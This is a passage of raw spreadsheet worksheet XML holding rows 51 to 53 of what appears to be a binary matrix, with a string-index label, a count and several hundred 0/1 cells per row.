      <c r="RV51">
        <v>0</v>
      </c>
      <c r="RW51">
        <v>0</v>
      </c>
      <c r="RX51">
        <v>0</v>
      </c>
      <c r="RY51">
        <v>0</v>
      </c>
      <c r="RZ51">
        <v>0</v>
      </c>
      <c r="SA51">
        <v>0</v>
      </c>
    </row>
    <row r="52" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A52" s="6" t="s">
        <v>2986</v>
      </c>
      <c r="B52">
        <v>39</v>
      </c>
      <c r="C52">
        <v>0</v>
      </c>
      <c r="D52">
        <v>0</v>
      </c>
      <c r="E52">
        <v>0</v>
      </c>
      <c r="F52">
        <v>0</v>
      </c>
      <c r="G52">
        <v>0</v>
      </c>
      <c r="H52">
        <v>0</v>
      </c>
      <c r="I52">
        <v>0</v>
      </c>
      <c r="J52">
        <v>0</v>
      </c>
      <c r="K52">
        <v>0</v>
      </c>
      <c r="L52">
        <v>0</v>
      </c>
      <c r="M52">
        <v>0</v>
      </c>
      <c r="N52">
        <v>0</v>
      </c>
      <c r="O52">
        <v>1</v>
      </c>
      <c r="P52">
        <v>0</v>
      </c>
      <c r="Q52">
        <v>0</v>
      </c>
      <c r="R52">
        <v>0</v>
      </c>
      <c r="S52">
        <v>0</v>
      </c>
      <c r="T52">
        <v>0</v>
      </c>
      <c r="U52">
        <v>0</v>
      </c>
      <c r="V52">
        <v>0</v>
      </c>
      <c r="W52">
        <v>0</v>
      </c>
      <c r="X52">
        <v>0</v>
      </c>
      <c r="Y52">
        <v>0</v>
      </c>
      <c r="Z52">
        <v>0</v>
      </c>
      <c r="AA52">
        <v>0</v>
      </c>
      <c r="AB52">
        <v>0</v>
      </c>
      <c r="AC52">
        <v>0</v>
      </c>
      <c r="AD52">
        <v>0</v>
      </c>
      <c r="AE52">
        <v>0</v>
      </c>
      <c r="AF52">
        <v>0</v>
      </c>
      <c r="AG52">
        <v>0</v>
      </c>
      <c r="AH52">
        <v>0</v>
      </c>
      <c r="AI52">
        <v>0</v>
      </c>
      <c r="AJ52">
        <v>1</v>
      </c>
      <c r="AK52">
        <v>0</v>
      </c>
      <c r="AL52">
        <v>0</v>
      </c>
      <c r="AM52">
        <v>0</v>
      </c>
      <c r="AN52">
        <v>0</v>
      </c>
      <c r="AO52">
        <v>0</v>
      </c>
      <c r="AP52">
        <v>0</v>
      </c>
      <c r="AQ52">
        <v>1</v>
      </c>
      <c r="AR52">
        <v>0</v>
      </c>
      <c r="AS52">
        <v>0</v>
      </c>
      <c r="AT52">
        <v>0</v>
      </c>
      <c r="AU52">
        <v>0</v>
      </c>
      <c r="AV52">
        <v>0</v>
      </c>
      <c r="AW52">
        <v>0</v>
      </c>
      <c r="AX52">
        <v>0</v>
      </c>
      <c r="AY52">
        <v>0</v>
      </c>
      <c r="AZ52">
        <v>0</v>
      </c>
      <c r="BA52">
        <v>0</v>
      </c>
      <c r="BB52">
        <v>0</v>
      </c>
      <c r="BC52">
        <v>0</v>
      </c>
      <c r="BD52">
        <v>0</v>
      </c>
      <c r="BE52">
        <v>0</v>
      </c>
      <c r="BF52">
        <v>0</v>
      </c>
      <c r="BG52">
        <v>0</v>
      </c>
      <c r="BH52">
        <v>0</v>
      </c>
      <c r="BI52">
        <v>0</v>
      </c>
      <c r="BJ52">
        <v>0</v>
      </c>
      <c r="BK52">
        <v>0</v>
      </c>
      <c r="BL52">
        <v>0</v>
      </c>
      <c r="BM52">
        <v>0</v>
      </c>
      <c r="BN52">
        <v>0</v>
      </c>
      <c r="BO52">
        <v>0</v>
      </c>
      <c r="BP52">
        <v>0</v>
      </c>
      <c r="BQ52">
        <v>0</v>
      </c>
      <c r="BR52">
        <v>0</v>
      </c>
      <c r="BS52">
        <v>0</v>
      </c>
      <c r="BT52">
        <v>0</v>
      </c>
      <c r="BU52">
        <v>0</v>
      </c>
      <c r="BV52">
        <v>0</v>
      </c>
      <c r="BW52">
        <v>0</v>
      </c>
      <c r="BX52">
        <v>1</v>
      </c>
      <c r="BY52">
        <v>0</v>
      </c>
      <c r="BZ52">
        <v>0</v>
      </c>
      <c r="CA52">
        <v>0</v>
      </c>
      <c r="CB52">
        <v>1</v>
      </c>
      <c r="CC52">
        <v>0</v>
      </c>
      <c r="CD52">
        <v>0</v>
      </c>
      <c r="CE52">
        <v>0</v>
      </c>
      <c r="CF52">
        <v>0</v>
      </c>
      <c r="CG52">
        <v>0</v>
      </c>
      <c r="CH52">
        <v>0</v>
      </c>
      <c r="CI52">
        <v>0</v>
      </c>
      <c r="CJ52">
        <v>0</v>
      </c>
      <c r="CK52">
        <v>0</v>
      </c>
      <c r="CL52">
        <v>0</v>
      </c>
      <c r="CM52">
        <v>0</v>
      </c>
      <c r="CN52">
        <v>0</v>
      </c>
      <c r="CO52">
        <v>0</v>
      </c>
      <c r="CP52">
        <v>0</v>
      </c>
      <c r="CQ52">
        <v>0</v>
      </c>
      <c r="CR52">
        <v>0</v>
      </c>
      <c r="CS52">
        <v>0</v>
      </c>
      <c r="CT52">
        <v>0</v>
      </c>
      <c r="CU52">
        <v>0</v>
      </c>
      <c r="CV52">
        <v>0</v>
      </c>
      <c r="CW52">
        <v>0</v>
      </c>
      <c r="CX52">
        <v>0</v>
      </c>
      <c r="CY52">
        <v>0</v>
      </c>
      <c r="CZ52">
        <v>0</v>
      </c>
      <c r="DA52">
        <v>0</v>
      </c>
      <c r="DB52">
        <v>0</v>
      </c>
      <c r="DC52">
        <v>0</v>
      </c>
      <c r="DD52">
        <v>0</v>
      </c>
      <c r="DE52">
        <v>0</v>
      </c>
      <c r="DF52">
        <v>0</v>
      </c>
      <c r="DG52">
        <v>0</v>
      </c>
      <c r="DH52">
        <v>0</v>
      </c>
      <c r="DI52">
        <v>0</v>
      </c>
      <c r="DJ52">
        <v>0</v>
      </c>
      <c r="DK52">
        <v>0</v>
      </c>
      <c r="DL52">
        <v>0</v>
      </c>
      <c r="DM52">
        <v>0</v>
      </c>
      <c r="DN52">
        <v>1</v>
      </c>
      <c r="DO52">
        <v>0</v>
      </c>
      <c r="DP52">
        <v>0</v>
      </c>
      <c r="DQ52">
        <v>0</v>
      </c>
      <c r="DR52">
        <v>0</v>
      </c>
      <c r="DS52">
        <v>0</v>
      </c>
      <c r="DT52">
        <v>1</v>
      </c>
      <c r="DU52">
        <v>0</v>
      </c>
      <c r="DV52">
        <v>0</v>
      </c>
      <c r="DW52">
        <v>0</v>
      </c>
      <c r="DX52">
        <v>0</v>
      </c>
      <c r="DY52">
        <v>0</v>
      </c>
      <c r="DZ52">
        <v>0</v>
      </c>
      <c r="EA52">
        <v>0</v>
      </c>
      <c r="EB52">
        <v>0</v>
      </c>
      <c r="EC52">
        <v>0</v>
      </c>
      <c r="ED52">
        <v>0</v>
      </c>
      <c r="EE52">
        <v>0</v>
      </c>
      <c r="EF52">
        <v>0</v>
      </c>
      <c r="EG52">
        <v>0</v>
      </c>
      <c r="EH52">
        <v>0</v>
      </c>
      <c r="EI52">
        <v>0</v>
      </c>
      <c r="EJ52">
        <v>0</v>
      </c>
      <c r="EK52">
        <v>0</v>
      </c>
      <c r="EL52">
        <v>0</v>
      </c>
      <c r="EM52">
        <v>0</v>
      </c>
      <c r="EN52">
        <v>0</v>
      </c>
      <c r="EO52">
        <v>0</v>
      </c>
      <c r="EP52">
        <v>0</v>
      </c>
      <c r="EQ52">
        <v>0</v>
      </c>
      <c r="ER52">
        <v>0</v>
      </c>
      <c r="ES52">
        <v>0</v>
      </c>
      <c r="ET52">
        <v>0</v>
      </c>
      <c r="EU52">
        <v>0</v>
      </c>
      <c r="EV52">
        <v>0</v>
      </c>
      <c r="EW52">
        <v>0</v>
      </c>
      <c r="EX52">
        <v>1</v>
      </c>
      <c r="EY52">
        <v>1</v>
      </c>
      <c r="EZ52">
        <v>0</v>
      </c>
      <c r="FA52">
        <v>0</v>
      </c>
      <c r="FB52">
        <v>0</v>
      </c>
      <c r="FC52">
        <v>0</v>
      </c>
      <c r="FD52">
        <v>0</v>
      </c>
      <c r="FE52">
        <v>0</v>
      </c>
      <c r="FF52">
        <v>0</v>
      </c>
      <c r="FG52">
        <v>0</v>
      </c>
      <c r="FH52">
        <v>0</v>
      </c>
      <c r="FI52">
        <v>0</v>
      </c>
      <c r="FJ52">
        <v>0</v>
      </c>
      <c r="FK52">
        <v>0</v>
      </c>
      <c r="FL52">
        <v>0</v>
      </c>
      <c r="FM52">
        <v>0</v>
      </c>
      <c r="FN52">
        <v>0</v>
      </c>
      <c r="FO52">
        <v>0</v>
      </c>
      <c r="FP52">
        <v>0</v>
      </c>
      <c r="FQ52">
        <v>0</v>
      </c>
      <c r="FR52">
        <v>1</v>
      </c>
      <c r="FS52">
        <v>0</v>
      </c>
      <c r="FT52">
        <v>0</v>
      </c>
      <c r="FU52">
        <v>0</v>
      </c>
      <c r="FV52">
        <v>0</v>
      </c>
      <c r="FW52">
        <v>0</v>
      </c>
      <c r="FX52">
        <v>0</v>
      </c>
      <c r="FY52">
        <v>0</v>
      </c>
      <c r="FZ52">
        <v>0</v>
      </c>
      <c r="GA52">
        <v>0</v>
      </c>
      <c r="GB52">
        <v>1</v>
      </c>
      <c r="GC52">
        <v>0</v>
      </c>
      <c r="GD52">
        <v>0</v>
      </c>
      <c r="GE52">
        <v>0</v>
      </c>
      <c r="GF52">
        <v>0</v>
      </c>
      <c r="GG52">
        <v>0</v>
      </c>
      <c r="GH52">
        <v>0</v>
      </c>
      <c r="GI52">
        <v>0</v>
      </c>
      <c r="GJ52">
        <v>1</v>
      </c>
      <c r="GK52">
        <v>0</v>
      </c>
      <c r="GL52">
        <v>0</v>
      </c>
      <c r="GM52">
        <v>0</v>
      </c>
      <c r="GN52">
        <v>1</v>
      </c>
      <c r="GO52">
        <v>0</v>
      </c>
      <c r="GP52">
        <v>0</v>
      </c>
      <c r="GQ52">
        <v>0</v>
      </c>
      <c r="GR52">
        <v>0</v>
      </c>
      <c r="GS52">
        <v>0</v>
      </c>
      <c r="GT52">
        <v>0</v>
      </c>
      <c r="GU52">
        <v>0</v>
      </c>
      <c r="GV52">
        <v>0</v>
      </c>
      <c r="GW52">
        <v>0</v>
      </c>
      <c r="GX52">
        <v>1</v>
      </c>
      <c r="GY52">
        <v>0</v>
      </c>
      <c r="GZ52">
        <v>0</v>
      </c>
      <c r="HA52">
        <v>0</v>
      </c>
      <c r="HB52">
        <v>1</v>
      </c>
      <c r="HC52">
        <v>0</v>
      </c>
      <c r="HD52">
        <v>0</v>
      </c>
      <c r="HE52">
        <v>0</v>
      </c>
      <c r="HF52">
        <v>0</v>
      </c>
      <c r="HG52">
        <v>0</v>
      </c>
      <c r="HH52">
        <v>0</v>
      </c>
      <c r="HI52">
        <v>0</v>
      </c>
      <c r="HJ52">
        <v>0</v>
      </c>
      <c r="HK52">
        <v>0</v>
      </c>
      <c r="HL52">
        <v>0</v>
      </c>
      <c r="HM52">
        <v>1</v>
      </c>
      <c r="HN52">
        <v>0</v>
      </c>
      <c r="HO52">
        <v>0</v>
      </c>
      <c r="HP52">
        <v>0</v>
      </c>
      <c r="HQ52">
        <v>0</v>
      </c>
      <c r="HR52">
        <v>0</v>
      </c>
      <c r="HS52">
        <v>0</v>
      </c>
      <c r="HT52">
        <v>0</v>
      </c>
      <c r="HU52">
        <v>0</v>
      </c>
      <c r="HV52">
        <v>0</v>
      </c>
      <c r="HW52">
        <v>0</v>
      </c>
      <c r="HX52">
        <v>0</v>
      </c>
      <c r="HY52">
        <v>0</v>
      </c>
      <c r="HZ52">
        <v>0</v>
      </c>
      <c r="IA52">
        <v>0</v>
      </c>
      <c r="IB52">
        <v>1</v>
      </c>
      <c r="IC52">
        <v>1</v>
      </c>
      <c r="ID52">
        <v>0</v>
      </c>
      <c r="IE52">
        <v>0</v>
      </c>
      <c r="IF52">
        <v>0</v>
      </c>
      <c r="IG52">
        <v>0</v>
      </c>
      <c r="IH52">
        <v>0</v>
      </c>
      <c r="II52">
        <v>0</v>
      </c>
      <c r="IJ52">
        <v>0</v>
      </c>
      <c r="IK52">
        <v>0</v>
      </c>
      <c r="IL52">
        <v>0</v>
      </c>
      <c r="IM52">
        <v>0</v>
      </c>
      <c r="IN52">
        <v>0</v>
      </c>
      <c r="IO52">
        <v>0</v>
      </c>
      <c r="IP52">
        <v>0</v>
      </c>
      <c r="IQ52">
        <v>0</v>
      </c>
      <c r="IR52">
        <v>0</v>
      </c>
      <c r="IS52">
        <v>0</v>
      </c>
      <c r="IT52">
        <v>0</v>
      </c>
      <c r="IU52">
        <v>1</v>
      </c>
      <c r="IV52">
        <v>0</v>
      </c>
      <c r="IW52">
        <v>0</v>
      </c>
      <c r="IX52">
        <v>1</v>
      </c>
      <c r="IY52">
        <v>1</v>
      </c>
      <c r="IZ52">
        <v>0</v>
      </c>
      <c r="JA52">
        <v>0</v>
      </c>
      <c r="JB52">
        <v>0</v>
      </c>
      <c r="JC52">
        <v>0</v>
      </c>
      <c r="JD52">
        <v>0</v>
      </c>
      <c r="JE52">
        <v>0</v>
      </c>
      <c r="JF52">
        <v>0</v>
      </c>
      <c r="JG52">
        <v>0</v>
      </c>
      <c r="JH52">
        <v>0</v>
      </c>
      <c r="JI52">
        <v>0</v>
      </c>
      <c r="JJ52">
        <v>0</v>
      </c>
      <c r="JK52">
        <v>0</v>
      </c>
      <c r="JL52">
        <v>0</v>
      </c>
      <c r="JM52">
        <v>1</v>
      </c>
      <c r="JN52">
        <v>0</v>
      </c>
      <c r="JO52">
        <v>0</v>
      </c>
      <c r="JP52">
        <v>0</v>
      </c>
      <c r="JQ52">
        <v>0</v>
      </c>
      <c r="JR52">
        <v>0</v>
      </c>
      <c r="JS52">
        <v>1</v>
      </c>
      <c r="JT52">
        <v>0</v>
      </c>
      <c r="JU52">
        <v>0</v>
      </c>
      <c r="JV52">
        <v>0</v>
      </c>
      <c r="JW52">
        <v>0</v>
      </c>
      <c r="JX52">
        <v>0</v>
      </c>
      <c r="JY52">
        <v>0</v>
      </c>
      <c r="JZ52">
        <v>0</v>
      </c>
      <c r="KA52">
        <v>0</v>
      </c>
      <c r="KB52">
        <v>0</v>
      </c>
      <c r="KC52">
        <v>0</v>
      </c>
      <c r="KD52">
        <v>0</v>
      </c>
      <c r="KE52">
        <v>1</v>
      </c>
      <c r="KF52">
        <v>0</v>
      </c>
      <c r="KG52">
        <v>0</v>
      </c>
      <c r="KH52">
        <v>0</v>
      </c>
      <c r="KI52">
        <v>0</v>
      </c>
      <c r="KJ52">
        <v>0</v>
      </c>
      <c r="KK52">
        <v>0</v>
      </c>
      <c r="KL52">
        <v>0</v>
      </c>
      <c r="KM52">
        <v>0</v>
      </c>
      <c r="KN52">
        <v>0</v>
      </c>
      <c r="KO52">
        <v>0</v>
      </c>
      <c r="KP52">
        <v>0</v>
      </c>
      <c r="KQ52">
        <v>0</v>
      </c>
      <c r="KR52">
        <v>0</v>
      </c>
      <c r="KS52">
        <v>0</v>
      </c>
      <c r="KT52">
        <v>1</v>
      </c>
      <c r="KU52">
        <v>0</v>
      </c>
      <c r="KV52">
        <v>0</v>
      </c>
      <c r="KW52">
        <v>0</v>
      </c>
      <c r="KX52">
        <v>0</v>
      </c>
      <c r="KY52">
        <v>0</v>
      </c>
      <c r="KZ52">
        <v>0</v>
      </c>
      <c r="LA52">
        <v>1</v>
      </c>
      <c r="LB52">
        <v>0</v>
      </c>
      <c r="LC52">
        <v>0</v>
      </c>
      <c r="LD52">
        <v>0</v>
      </c>
      <c r="LE52">
        <v>0</v>
      </c>
      <c r="LF52">
        <v>0</v>
      </c>
      <c r="LG52">
        <v>0</v>
      </c>
      <c r="LH52">
        <v>0</v>
      </c>
      <c r="LI52">
        <v>0</v>
      </c>
      <c r="LJ52">
        <v>0</v>
      </c>
      <c r="LK52">
        <v>0</v>
      </c>
      <c r="LL52">
        <v>1</v>
      </c>
      <c r="LM52">
        <v>0</v>
      </c>
      <c r="LN52">
        <v>0</v>
      </c>
      <c r="LO52">
        <v>0</v>
      </c>
      <c r="LP52">
        <v>0</v>
      </c>
      <c r="LQ52">
        <v>0</v>
      </c>
      <c r="LR52">
        <v>1</v>
      </c>
      <c r="LS52">
        <v>0</v>
      </c>
      <c r="LT52">
        <v>0</v>
      </c>
      <c r="LU52">
        <v>0</v>
      </c>
      <c r="LV52">
        <v>0</v>
      </c>
      <c r="LW52">
        <v>0</v>
      </c>
      <c r="LX52">
        <v>0</v>
      </c>
      <c r="LY52">
        <v>0</v>
      </c>
      <c r="LZ52">
        <v>1</v>
      </c>
      <c r="MA52">
        <v>0</v>
      </c>
      <c r="MB52">
        <v>0</v>
      </c>
      <c r="MC52">
        <v>0</v>
      </c>
      <c r="MD52">
        <v>0</v>
      </c>
      <c r="ME52">
        <v>0</v>
      </c>
      <c r="MF52">
        <v>0</v>
      </c>
      <c r="MG52">
        <v>0</v>
      </c>
      <c r="MH52">
        <v>0</v>
      </c>
      <c r="MI52">
        <v>1</v>
      </c>
      <c r="MJ52">
        <v>0</v>
      </c>
      <c r="MK52">
        <v>0</v>
      </c>
      <c r="ML52">
        <v>0</v>
      </c>
      <c r="MM52">
        <v>0</v>
      </c>
      <c r="MN52">
        <v>0</v>
      </c>
      <c r="MO52">
        <v>0</v>
      </c>
      <c r="MP52">
        <v>0</v>
      </c>
      <c r="MQ52">
        <v>0</v>
      </c>
      <c r="MR52">
        <v>0</v>
      </c>
      <c r="MS52">
        <v>0</v>
      </c>
      <c r="MT52">
        <v>0</v>
      </c>
      <c r="MU52">
        <v>0</v>
      </c>
      <c r="MV52">
        <v>0</v>
      </c>
      <c r="MW52">
        <v>0</v>
      </c>
      <c r="MX52">
        <v>0</v>
      </c>
      <c r="MY52">
        <v>0</v>
      </c>
      <c r="MZ52">
        <v>0</v>
      </c>
      <c r="NA52">
        <v>0</v>
      </c>
      <c r="NB52">
        <v>0</v>
      </c>
      <c r="NC52">
        <v>0</v>
      </c>
      <c r="ND52">
        <v>0</v>
      </c>
      <c r="NE52">
        <v>0</v>
      </c>
      <c r="NF52">
        <v>0</v>
      </c>
      <c r="NG52">
        <v>0</v>
      </c>
      <c r="NH52">
        <v>0</v>
      </c>
      <c r="NI52">
        <v>0</v>
      </c>
      <c r="NJ52">
        <v>0</v>
      </c>
      <c r="NK52">
        <v>1</v>
      </c>
      <c r="NL52">
        <v>0</v>
      </c>
      <c r="NM52">
        <v>0</v>
      </c>
      <c r="NN52">
        <v>0</v>
      </c>
      <c r="NO52">
        <v>0</v>
      </c>
      <c r="NP52">
        <v>0</v>
      </c>
      <c r="NQ52">
        <v>0</v>
      </c>
      <c r="NR52">
        <v>0</v>
      </c>
      <c r="NS52">
        <v>0</v>
      </c>
      <c r="NT52">
        <v>0</v>
      </c>
      <c r="NU52">
        <v>0</v>
      </c>
      <c r="NV52">
        <v>0</v>
      </c>
      <c r="NW52">
        <v>0</v>
      </c>
      <c r="NX52">
        <v>0</v>
      </c>
      <c r="NY52">
        <v>0</v>
      </c>
      <c r="NZ52">
        <v>1</v>
      </c>
      <c r="OA52">
        <v>0</v>
      </c>
      <c r="OB52">
        <v>0</v>
      </c>
      <c r="OC52">
        <v>1</v>
      </c>
      <c r="OD52">
        <v>0</v>
      </c>
      <c r="OE52">
        <v>0</v>
      </c>
      <c r="OF52">
        <v>0</v>
      </c>
      <c r="OG52">
        <v>0</v>
      </c>
      <c r="OH52">
        <v>0</v>
      </c>
      <c r="OI52">
        <v>0</v>
      </c>
      <c r="OJ52">
        <v>1</v>
      </c>
      <c r="OK52">
        <v>0</v>
      </c>
      <c r="OL52">
        <v>0</v>
      </c>
      <c r="OM52">
        <v>0</v>
      </c>
      <c r="ON52">
        <v>0</v>
      </c>
      <c r="OO52">
        <v>0</v>
      </c>
      <c r="OP52">
        <v>0</v>
      </c>
      <c r="OQ52">
        <v>0</v>
      </c>
      <c r="OR52">
        <v>0</v>
      </c>
      <c r="OS52">
        <v>0</v>
      </c>
      <c r="OT52">
        <v>0</v>
      </c>
      <c r="OU52">
        <v>0</v>
      </c>
      <c r="OV52">
        <v>0</v>
      </c>
      <c r="OW52">
        <v>0</v>
      </c>
      <c r="OX52">
        <v>0</v>
      </c>
      <c r="OY52">
        <v>1</v>
      </c>
      <c r="OZ52">
        <v>0</v>
      </c>
      <c r="PA52">
        <v>0</v>
      </c>
      <c r="PB52">
        <v>0</v>
      </c>
      <c r="PC52">
        <v>0</v>
      </c>
      <c r="PD52">
        <v>0</v>
      </c>
      <c r="PE52">
        <v>0</v>
      </c>
      <c r="PF52">
        <v>0</v>
      </c>
      <c r="PG52">
        <v>0</v>
      </c>
      <c r="PH52">
        <v>0</v>
      </c>
      <c r="PI52">
        <v>0</v>
      </c>
      <c r="PJ52">
        <v>0</v>
      </c>
      <c r="PK52">
        <v>0</v>
      </c>
      <c r="PL52">
        <v>0</v>
      </c>
      <c r="PM52">
        <v>0</v>
      </c>
      <c r="PN52">
        <v>0</v>
      </c>
      <c r="PO52">
        <v>0</v>
      </c>
      <c r="PP52">
        <v>0</v>
      </c>
      <c r="PQ52">
        <v>0</v>
      </c>
      <c r="PR52">
        <v>1</v>
      </c>
      <c r="PS52">
        <v>1</v>
      </c>
      <c r="PT52">
        <v>0</v>
      </c>
      <c r="PU52">
        <v>0</v>
      </c>
      <c r="PV52">
        <v>0</v>
      </c>
      <c r="PW52">
        <v>0</v>
      </c>
      <c r="PX52">
        <v>0</v>
      </c>
      <c r="PY52">
        <v>0</v>
      </c>
      <c r="PZ52">
        <v>0</v>
      </c>
      <c r="QA52">
        <v>0</v>
      </c>
      <c r="QB52">
        <v>0</v>
      </c>
      <c r="QC52">
        <v>0</v>
      </c>
      <c r="QD52">
        <v>0</v>
      </c>
      <c r="QE52">
        <v>0</v>
      </c>
      <c r="QF52">
        <v>0</v>
      </c>
      <c r="QG52">
        <v>0</v>
      </c>
      <c r="QH52">
        <v>0</v>
      </c>
      <c r="QI52">
        <v>0</v>
      </c>
      <c r="QJ52">
        <v>0</v>
      </c>
      <c r="QK52">
        <v>0</v>
      </c>
      <c r="QL52">
        <v>0</v>
      </c>
      <c r="QM52">
        <v>0</v>
      </c>
      <c r="QN52">
        <v>0</v>
      </c>
      <c r="QO52">
        <v>0</v>
      </c>
      <c r="QP52">
        <v>1</v>
      </c>
      <c r="QQ52">
        <v>0</v>
      </c>
      <c r="QR52">
        <v>0</v>
      </c>
      <c r="QS52">
        <v>0</v>
      </c>
      <c r="QT52">
        <v>0</v>
      </c>
      <c r="QU52">
        <v>0</v>
      </c>
      <c r="QV52">
        <v>0</v>
      </c>
      <c r="QW52">
        <v>0</v>
      </c>
      <c r="QX52">
        <v>0</v>
      </c>
      <c r="QY52">
        <v>0</v>
      </c>
      <c r="QZ52">
        <v>0</v>
      </c>
      <c r="RA52">
        <v>0</v>
      </c>
      <c r="RB52">
        <v>0</v>
      </c>
      <c r="RC52">
        <v>0</v>
      </c>
      <c r="RD52">
        <v>0</v>
      </c>
      <c r="RE52">
        <v>0</v>
      </c>
      <c r="RF52">
        <v>0</v>
      </c>
      <c r="RG52">
        <v>0</v>
      </c>
      <c r="RH52">
        <v>0</v>
      </c>
      <c r="RI52">
        <v>0</v>
      </c>
      <c r="RJ52">
        <v>0</v>
      </c>
      <c r="RK52">
        <v>0</v>
      </c>
      <c r="RL52">
        <v>0</v>
      </c>
      <c r="RM52">
        <v>1</v>
      </c>
      <c r="RN52">
        <v>0</v>
      </c>
      <c r="RO52">
        <v>0</v>
      </c>
      <c r="RP52">
        <v>0</v>
      </c>
      <c r="RQ52">
        <v>0</v>
      </c>
      <c r="RR52">
        <v>0</v>
      </c>
      <c r="RS52">
        <v>0</v>
      </c>
      <c r="RT52">
        <v>0</v>
      </c>
      <c r="RU52">
        <v>0</v>
      </c>
      <c r="RV52">
        <v>0</v>
      </c>
      <c r="RW52">
        <v>0</v>
      </c>
      <c r="RX52">
        <v>0</v>
      </c>
      <c r="RY52">
        <v>0</v>
      </c>
      <c r="RZ52">
        <v>0</v>
      </c>
      <c r="SA52">
        <v>0</v>
      </c>
    </row>
    <row r="53" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A53" s="6" t="s">
        <v>2991</v>
      </c>
      <c r="B53">
        <v>184</v>
      </c>
      <c r="C53">
        <v>0</v>
      </c>
      <c r="D53">
        <v>1</v>
      </c>
      <c r="E53">
        <v>1</v>
      </c>
      <c r="F53">
        <v>1</v>
      </c>
      <c r="G53">
        <v>0</v>
      </c>
      <c r="H53">
        <v>0</v>
      </c>
      <c r="I53">
        <v>0</v>
      </c>
      <c r="J53">
        <v>0</v>
      </c>
      <c r="K53">
        <v>1</v>
      </c>
      <c r="L53">
        <v>0</v>
      </c>
      <c r="M53">
        <v>0</v>
      </c>
      <c r="N53">
        <v>0</v>
      </c>
      <c r="O53">
        <v>1</v>
      </c>
      <c r="P53">
        <v>0</v>
      </c>
      <c r="Q53">
        <v>1</v>
      </c>
      <c r="R53">
        <v>0</v>
      </c>
      <c r="S53">
        <v>0</v>
      </c>
      <c r="T53">
        <v>0</v>
      </c>
      <c r="U53">
        <v>1</v>
      </c>
      <c r="V53">
        <v>0</v>
      </c>
      <c r="W53">
        <v>1</v>
      </c>
      <c r="X53">
        <v>1</v>
      </c>
      <c r="Y53">
        <v>0</v>
      </c>
      <c r="Z53">
        <v>1</v>
      </c>
      <c r="AA53">
        <v>0</v>
      </c>
      <c r="AB53">
        <v>1</v>
      </c>
      <c r="AC53">
        <v>1</v>
      </c>
      <c r="AD53">
        <v>1</v>
      </c>
      <c r="AE53">
        <v>0</v>
      </c>
      <c r="AF53">
        <v>0</v>
      </c>
      <c r="AG53">
        <v>0</v>
      </c>
      <c r="AH53">
        <v>0</v>
      </c>
      <c r="AI53">
        <v>1</v>
      </c>
      <c r="AJ53">
        <v>1</v>
      </c>
      <c r="AK53">
        <v>0</v>
      </c>
      <c r="AL53">
        <v>0</v>
      </c>
      <c r="AM53">
        <v>1</v>
      </c>
      <c r="AN53">
        <v>1</v>
      </c>
      <c r="AO53">
        <v>1</v>
      </c>
      <c r="AP53">
        <v>0</v>
      </c>
      <c r="AQ53">
        <v>1</v>
      </c>
      <c r="AR53">
        <v>0</v>
      </c>
      <c r="AS53">
        <v>0</v>
      </c>
      <c r="AT53">
        <v>1</v>
      </c>
      <c r="AU53">
        <v>0</v>
      </c>
      <c r="AV53">
        <v>0</v>
      </c>
      <c r="AW53">
        <v>0</v>
      </c>
      <c r="AX53">
        <v>0</v>
      </c>
      <c r="AY53">
        <v>0</v>
      </c>
      <c r="AZ53">
        <v>1</v>
      </c>
      <c r="BA53">
        <v>0</v>
      </c>
      <c r="BB53">
        <v>1</v>
      </c>
      <c r="BC53">
        <v>0</v>
      </c>
      <c r="BD53">
        <v>0</v>
      </c>
      <c r="BE53">
        <v>0</v>
      </c>
      <c r="BF53">
        <v>0</v>
      </c>
      <c r="BG53">
        <v>0</v>
      </c>
      <c r="BH53">
        <v>0</v>
      </c>
      <c r="BI53">
        <v>0</v>
      </c>
      <c r="BJ53">
        <v>0</v>
      </c>
      <c r="BK53">
        <v>0</v>
      </c>
      <c r="BL53">
        <v>0</v>
      </c>
      <c r="BM53">
        <v>1</v>
      </c>
      <c r="BN53">
        <v>0</v>
      </c>
      <c r="BO53">
        <v>0</v>
      </c>
      <c r="BP53">
        <v>1</v>
      </c>
      <c r="BQ53">
        <v>0</v>
      </c>
      <c r="BR53">
        <v>1</v>
      </c>
      <c r="BS53">
        <v>0</v>
      </c>
      <c r="BT53">
        <v>0</v>
      </c>
      <c r="BU53">
        <v>0</v>
      </c>
      <c r="BV53">
        <v>1</v>
      </c>
      <c r="BW53">
        <v>0</v>
      </c>
      <c r="BX53">
        <v>1</v>
      </c>
      <c r="BY53">
        <v>1</v>
      </c>
      <c r="BZ53">
        <v>1</v>
      </c>
      <c r="CA53">
        <v>1</v>
      </c>
      <c r="CB53">
        <v>1</v>
      </c>
      <c r="CC53">
        <v>0</v>
      </c>
      <c r="CD53">
        <v>1</v>
      </c>
      <c r="CE53">
        <v>0</v>
      </c>
      <c r="CF53">
        <v>0</v>
      </c>
      <c r="CG53">
        <v>1</v>
      </c>
      <c r="CH53">
        <v>0</v>
      </c>
      <c r="CI53">
        <v>0</v>
      </c>
      <c r="CJ53">
        <v>0</v>
      </c>
      <c r="CK53">
        <v>0</v>
      </c>
      <c r="CL53">
        <v>0</v>
      </c>
      <c r="CM53">
        <v>0</v>
      </c>
      <c r="CN53">
        <v>0</v>
      </c>
      <c r="CO53">
        <v>0</v>
      </c>
      <c r="CP53">
        <v>1</v>
      </c>
      <c r="CQ53">
        <v>1</v>
      </c>
      <c r="CR53">
        <v>1</v>
      </c>
      <c r="CS53">
        <v>1</v>
      </c>
      <c r="CT53">
        <v>0</v>
      </c>
      <c r="CU53">
        <v>1</v>
      </c>
      <c r="CV53">
        <v>0</v>
      </c>
      <c r="CW53">
        <v>0</v>
      </c>
      <c r="CX53">
        <v>1</v>
      </c>
      <c r="CY53">
        <v>0</v>
      </c>
      <c r="CZ53">
        <v>0</v>
      </c>
      <c r="DA53">
        <v>1</v>
      </c>
      <c r="DB53">
        <v>0</v>
      </c>
      <c r="DC53">
        <v>1</v>
      </c>
      <c r="DD53">
        <v>0</v>
      </c>
      <c r="DE53">
        <v>0</v>
      </c>
      <c r="DF53">
        <v>0</v>
      </c>
      <c r="DG53">
        <v>1</v>
      </c>
      <c r="DH53">
        <v>0</v>
      </c>
      <c r="DI53">
        <v>0</v>
      </c>
      <c r="DJ53">
        <v>0</v>
      </c>
      <c r="DK53">
        <v>1</v>
      </c>
      <c r="DL53">
        <v>0</v>
      </c>
      <c r="DM53">
        <v>1</v>
      </c>
      <c r="DN53">
        <v>1</v>
      </c>
      <c r="DO53">
        <v>1</v>
      </c>
      <c r="DP53">
